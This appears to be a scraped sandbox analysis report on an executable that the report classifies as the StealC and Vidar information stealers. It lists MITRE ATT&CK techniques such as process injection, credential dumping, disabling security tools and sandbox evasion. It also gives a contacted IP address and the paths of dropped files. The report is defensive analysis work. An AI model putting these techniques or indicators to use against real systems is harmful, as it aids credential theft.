Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CGHDAKKJ

C:\ProgramData\DAAFBAKECAEGCBFIEGDG

C:\ProgramData\DAAFBAKECAEGCBFIEGDGIEGIEH

C:\ProgramData\EBFBKFBGIIIDGDGCFCGI

C:\ProgramData\EBGCFBGCBFHJECBGDAKKJDGHII

C:\ProgramData\ECGIIIDAKJDHJKFHIEBFCGHCGH

C:\ProgramData\GCGCFCBAKKFBFIECAEBA

C:\ProgramData\GIIEGHIDBGHIECAAECGDAEHDHJ

C:\ProgramData\JKEGDHCF

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 00AC9860 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 212
libraryloaderCOMMON

Function 00AB45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 00ABBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6CAD35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00AC4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00AC9C10 Relevance: 236.9, APIs: 112, Strings: 23, Instructions: 684
libraryloaderCOMMON

Function 00AB7710 Relevance: 96.8, APIs: 54, Strings: 1, Instructions: 584
stringmemoryCOMMON

Function 00AC0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre